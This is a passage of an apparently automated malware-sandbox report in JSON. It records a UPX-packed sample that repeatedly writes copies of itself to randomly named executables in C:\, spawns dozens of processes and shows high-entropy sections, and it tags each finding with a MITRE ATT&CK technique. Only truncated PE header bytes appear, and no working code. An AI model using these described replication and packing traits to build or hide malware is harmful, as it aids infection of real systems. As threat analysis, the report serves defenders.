4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ftpltv.exe\" wrote 16700 bytes starting with PE header signature to file \"C:\\bvrxv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"bvrxv.exe\" wrote 16713 bytes starting with PE header signature to file \"C:\\lbbnbl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lbbnbl.exe\" wrote 16726 bytes starting with PE header signature to file \"C:\\vxdlrx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vxdlrx.exe\" wrote 16740 bytes starting with PE header signature to file \"C:\\xnvjvl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xnvjvl.exe\" wrote 16760 bytes starting with PE header signature to file \"C:\\hnnnrvf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hnnnrvf.exe\" wrote 16771 bytes starting with PE header signature to file \"C:\\tjttplv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tjttplv.exe\" wrote 16785 bytes starting with PE header signature to file \"C:\\tjbjhtr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tjbjhtr.exe\" wrote 16798 bytes starting with PE header signature to file \"C:\\prxnx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"prxnx.exe\" wrote 16816 bytes starting with PE header signature to file \"C:\\fnnbp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fnnbp.exe\" wrote 16835 bytes starting with PE header signature to file \"C:\\vpfhrjh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vpfhrjh.exe\" wrote 16847 bytes starting with PE header signature to file \"C:\\vjjxj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vjjxj.exe\" wrote 16865 bytes starting with PE header signature to file \"C:\\fxbfvbf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fxbfvbf.exe\" wrote 16885 bytes starting with PE header signature to file \"C:\\ltbfnb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ltbfnb.exe\" wrote 16900 bytes starting with PE header signature to file \"C:\\48080.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"48080.exe\" wrote 16916 bytes starting with PE header signature to file \"C:\\626080.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"626080.exe\" wrote 16933 bytes starting with PE header signature to file \"C:\\840000.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"840000.exe\" wrote 16947 bytes starting with PE header signature to file \"C:\\dlbjrj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dlbjrj.exe\" wrote 16958 bytes starting with PE header signature to file \"C:\\flflvfr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"flflvfr.exe\" wrote 16977 bytes starting with PE header signature to file \"C:\\dvxnn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dvxnn.exe\" wrote 16994 bytes starting with PE header signature to file \"C:\\nndlvj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nndlvj.exe\" wrote 17008 bytes starting with PE header signature to file \"C:\\fnlpb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fnlpb.exe\" wrote 17027 bytes starting with PE header signature to file \"C:\\hltjhx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hltjhx.exe\" wrote 17046 bytes starting with PE header signature to file \"C:\\lxdxh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"20406.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"486604.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"2028060.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"dprdh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"nfhppl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4080282.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"vjntv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"bpfndvl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"blrpxnl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"pvrjd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"nbdbxn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"tlvnl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"dtrfjn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"lvttpxb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"lxvdh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"jbbxlvh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4408646.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"86668.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"08086.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"624642.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"48064.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"lxdxh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lxdxh.exe]- [targetUID: 00000000-00001424]\n \"hltjhx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hltjhx.exe]- [targetUID: 00000000-00001424]\n \"fnlpb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fnlpb.exe]- [targetUID: 00000000-00003600]\n \"nndlvj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nndlvj.exe]- [targetUID: 00000000-00003600]\n \"dvxnn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dvxnn.exe]- [targetUID: 00000000-00002824]\n \"flflvfr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\flflvfr.exe]- [targetUID: 00000000-00002524]\n \"dlbjrj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dlbjrj.exe]- [targetUID: 00000000-00002524]\n \"840000.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\840000.exe]- [targetUID: 00000000-00003920]\n \"626080.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\626080.exe]- [targetUID: 00000000-00001004]\n \"48080.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\48080.exe]- [targetUID: 00000000-00001004]\n \"ltbfnb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ltbfnb.exe]- [targetUID: 00000000-00003952]\n \"fxbfvbf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fxbfvbf.exe]- [targetUID: 00000000-00000900]\n \"vjjxj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vjjxj.exe]- [targetUID: 00000000-00004152]\n \"vpfhrjh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vpfhrjh.exe]- [targetUID: 00000000-00004152]\n \"fnnbp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fnnbp.exe]- [targetUID: 00000000-00002556]\n \"prxnx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\prxnx.exe]- [targetUID: 00000000-00002556]\n \"tjbjhtr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tjbjhtr.exe]- [targetUID: 00000000-00000276]\n \"tjttplv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tjttplv.exe]- [targetUID: 00000000-00001580]\n \"hnnnrvf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hnnnrvf.exe]- [targetUID: 00000000-00001580]\n \"xnvjvl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xnvjvl.exe]- [targetUID: 00000000-00001876]\n \"vxdlrx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vxdlrx.exe]- [targetUID: 00000000-00001876]\n \"lbbnbl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lbbnbl.exe]- [targetUID: 00000000-00003180]\n \"bvrxv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bvrxv.exe]- [targetUID: 00000000-00003180]\n \"ftpltv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ftpltv.exe]- [targetUID: 00000000-00001444]\n \"880446.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\880446.exe]- [targetUID: 00000000-00001444]\n \"24808.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\24808.exe]- [targetUID: 00000000-00002744]\n \"08622.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\08622.exe]- [targetUID: 00000000-00002744]\n \"0400068.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0400068.exe]- [targetUID: 00000000-00002192]\n \"4622600.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4622600.exe]- [targetUID: 00000000-00002308]\n \"tnxhl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tnxhl.exe]- [targetUID: 00000000-00002040]\n \"lrbtfbt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lrbtfbt.exe]- [targetUID: 00000000-00002040]\n \"jtlftjr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jtlftjr.exe]- [targetUID: 00000000-00004228]\n \"bjvtfxj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bjvtfxj.exe]- [targetUID: 00000000-00000564]\n \"rfbfjv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rfbfjv.exe]- [targetUID: 00000000-00004072]\n \"6244848.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6244848.exe]- [targetUID: 00000000-00004072]\n \"4022682.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4022682.exe]- [targetUID: 00000000-00002736]\n \"vfdxfvl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vfdxfvl.exe]- [targetUID: 00000000-00003272]\n \"hpdphl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hpdphl.exe]- [targetUID: 00000000-00002412]\n \"24826.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\24826.exe]- [targetUID: 00000000-00002412]\n \"6686484.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6686484.exe]- [targetUID: 00000000-00004508]\n \"6260866.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6260866.exe]- [targetUID: 00000000-00004508]\n \"60202.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\60202.exe]- [targetUID: 00000000-00004280]\n \"tplfhb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tplfhb.exe]- [targetUID: 00000000-00002380]\n \"pddnp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pddnp.exe]- [targetUID: 00000000-00002804]\n \"nxlhfx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nxlhfx.exe]- [targetUID: 00000000-00002804]\n \"pvtnp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: 00000000-00004252]\n \"jtjnrb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jtjnrb.exe]- [targetUID: 00000000-00001660]\n \"40484.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\40484.exe]- [targetUID: 00000000-00003748]\n \"2046660.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2046660.exe]- [targetUID: 00000000-00003812]\n \"bfbfxx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bfbfxx.exe]- [targetUID: 00000000-00003812]\n \"ljlpvrx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ljlpvrx.exe]- [targetUID: 00000000-00006072]\n \"rjldjr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rjldjr.exe]- [targetUID: 00000000-00004328]\n \"lpljbv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lpljbv.exe]- [targetUID: 00000000-00004328]\n \"fvbll.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fvbll.exe]- [targetUID: 00000000-00006124]\n \"vvvtjhp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vvvtjhp.exe]- [targetUID: 00000000-00006088]\n \"hrrrr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hrrrr.exe]- [targetUID: 00000000-00006088]\n \"806288.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\806288.exe]- [targetUID: 00000000-00004216]\n \"20484.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\20484.exe]- [targetUID: 00000000-00005936]\n \"4262848.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4262848.exe]- [targetUID: 00000000-00005936]\n \"484648.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\484648.exe]- [targetUID: 00000000-00005928]\n \"8402624.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8402624.exe]- [targetUID: 00000000-00005928]\n \"226242.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\226242.exe]- [targetUID: 00000000-00005968]\n \"26224.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\26224.exe]- [targetUID: 00000000-00006044]\n \"4822004.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4822004.exe]- [targetUID: 00000000-00006044]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c\" has section name UPX1 with entropy \"7.97244478673\"\n \"20406.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"486604.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"2028060.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"dprdh.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"nfhppl.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"4080282.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"vjntv.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"bpfndvl.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"blrpxnl.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"pvrjd.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"nbdbxn.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"tlvnl.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"dtrfjn.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"lvttpxb.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"lxvdh.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"jbbxlvh.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"4408646.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"86668.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"08086.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"624642.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"48064.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"lxdxh.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"hltjhx.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"fnlpb.exe\" has section name UPX1 with entropy \"7.97244478673\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-7", "relevance": 10, "name": "PE file is packed with UPX", "description": "\"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c\" has a section named \"UPX0\"\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c\" has a section named \"UPX1\"\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c\" has a section named \"UPX2\"\n \"20406.exe\" has a section named \"UPX0\"\n \"20406.exe\" has a section named \"UPX1\"\n \"20406.exe\" has a section named \"UPX2\"\n \"486604.exe\" has a section named \"UPX0\"\n \"486604.exe\" has a section named \"UPX1\"\n \"486604.exe\" has a section named \"UPX2\"\n \"2028060.exe\" has a section named \"UPX0\"\n \"2028060.exe\" has a section named \"UPX1\"\n \"2028060.exe\" has a section named \"UPX2\"\n \"dprdh.exe\" has a section named \"UPX0\"\n \"dprdh.exe\" has a section named \"UPX1\"\n \"dprdh.exe\" has a section named \"UPX2\"\n \"nfhppl.exe\" has a section named \"UPX0\"\n \"nfhppl.exe\" has a section named \"UPX1\"\n \"nfhppl.exe\" has a section named \"UPX2\"\n \"4080282.exe\" has a section named \"UPX0\"\n \"4080282.exe\" has a section named \"UPX1\"\n \"4080282.exe\" has a section named \"UPX2\"\n \"vjntv.exe\" has a section named \"UPX0\"\n \"vjntv.exe\" has a section named \"UPX1\"\n \"vjntv.exe\" has a section named \"UPX2\"\n \"bpfndvl.exe\" has a section named \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" (UID: 00000000-00005920)\n Spawned process \"4822004.exe\" (UID: 00000000-00006044)\n Spawned process \"26224.exe\" (UID: 00000000-00005968)\n Spawned process \"226242.exe\" (UID: 00000000-00005996)\n Spawned process \"8402624.exe\" (UID: 00000000-00005928)\n Spawned process \"484648.exe\" (UID: 00000000-00006016)\n Spawned process \"4262848.exe\" (UID: 00000000-00005936)\n Spawned process \"20484.exe\" (UID: 00000000-00003884)\n Spawned process \"806288.exe\" (UID: 00000000-00004216)\n Spawned process \"hrrrr.exe\" (UID: 00000000-00006088)\n Spawned process \"vvvtjhp.exe\" (UID: 00000000-00006124)\n Spawned process \"fvbll.exe\" (UID: 00000000-00003980)\n Spawned process \"lpljbv.exe\" (UID: 00000000-00004328)\n Spawned process \"rjldjr.exe\" (UID: 00000000-00002288)\n Spawned process \"ljlpvrx.exe\" (UID: 00000000-00006072)\n Spawned process \"bfbfxx.exe\" (UID: 00000000-00003812)\n Spawned process \"2046660.exe\" (UID: 00000000-00003748)\n Spawned process \"40484.exe\" (UID: 00000000-00001660)\n Spawned process \"jtjnrb.exe\" (UID: 00000000-00004464)\n Spawned process \"pvtnp.exe\" (UID: 00000000-00004252)\n Spawned process \"nxlhfx.exe\" (UID: 00000000-00002804)\n Spawned process \"pddnp.exe\" (UID: 00000000-00002380)\n Spawned process \"tplfhb.exe\" (UID: 00000000-00004280)\n Spawned process \"60202.exe\" (UID: 00000000-00004244)\n Spawned process \"6260866.exe\" (UID: 00000000-00004508)\n Spawned process \"6686484.exe\" (UID: 00000000-00003440)\n Spawned process \"24826.exe\" (UID: 00000000-00002412)\n Spawned process \"hpdphl.exe\" (UID: 00000000-00003272)\n Spawned process \"vfdxfvl.exe\" (UID: 00000000-00003620)\n Spawned process \"4022682.exe\" (UID: 00000000-00002736)\n Spawned process \"6244848.exe\" (UID: 00000000-00004072)\n Spawned process \"rfbfjv.exe\" (UID: 00000000-00000564)\n Spawned process \"bjvtfxj.exe\" (UID: 00000000-00004228)\n Spawned process \"jtlftjr.exe\" (UID: 00000000-00004256)\n Spawned process \"lrbtfbt.exe\" (UID: 00000000-00002040)\n Spawned process \"tnxhl.exe\" (UID: 00000000-00002308)\n Spawned process \"4622600.exe\" (UID: 00000000-00002796)\n Spawned process \"0400068.exe\" (UID: 00000000-00002192)\n Spawned process \"08622.exe\" (UID: 00000000-00002744)\n Spawned process \"24808.exe\" (UID: 00000000-00003692)\n Spawned process \"880446.exe\" (UID: 00000000-00001444)\n Spawned process \"ftpltv.exe\" (UID: 00000000-00003236)\n Spawned process \"bvrxv.exe\" (UID: 00000000-00003180)\n Spawned process \"lbbnbl.exe\" (UID: 00000000-00003220)\n Spawned process \"vxdlrx.exe\" (UID: 00000000-00001876)\n Spawned process \"xnvjvl.exe\" (UID: 00000000-00001256)\n Spawned process \"hnnnrvf.exe\" (UID: 00000000-00001580)\n Spawned process \"tjttplv.exe\" (UID: 00000000-00000276)\n Spawned process \"tjbjhtr.exe\" (UID: 00000000-00003156)\n Spawned process \"prxnx.exe\" (UID: 00000000-00002556)\n Spawned process \"fnnbp.exe\" (UID: 00000000-00001536)\n Spawned process \"vpfhrjh.exe\" (UID: 00000000-00004152)\n Spawned process \"vjjxj.exe\" (UID: 00000000-00000900)\n Spawned process \"fxbfvbf.exe\" (UID: 00000000-00004112)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": 